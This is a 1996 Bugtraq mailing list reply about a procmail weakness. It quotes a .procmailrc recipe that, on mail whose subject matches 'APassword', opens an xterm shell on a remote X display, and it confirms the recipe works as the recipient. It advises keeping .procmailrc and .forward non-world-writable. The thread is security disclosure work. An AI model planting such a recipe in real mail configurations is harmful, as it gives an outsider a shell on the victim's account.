[3072] in bugtraq
Re: procmail
daemon@ATHENA.MIT.EDU (James Wang)
Tue Aug 6 22:30:58 1996
Date: Tue, 6 Aug 1996 17:58:29 -0500
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
From: James Wang <ming@math.uh.edu>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
In-Reply-To: <199608062130.WAA25867@server2.mersinet.co.uk>
On Tue, 6 Aug 1996, Neil Soveran-Charley wrote:
> I think there may well be such an exploit. I'd guess it is simply
> something like:
>
> (.procmailrc contents)
>
> :0 Hc
> * ^Subject:.*APassword
> /usr/bin/X11/xterm -display <some display> -e <a shell>
>
> (end .procmailrc)
>
I try it with a different usr account then my and it does work.
It shows the owner as the person that receiving the mail.
It needed a | in-front of /usr/bin/X11/xterm .....
It might work with just the command in .forward. So, it might not
only procmail's problem. One must make sure his/her .procmailrc and
.forward are not world writable.
>
> I'm sure procmail MUST have some security feature to disallow this
> sort of thing? But I could be wrong, and haven't checked the manual
> pages yet.
>
No. Since there is no way for procmail to know before hand what
kind of program that you might use.
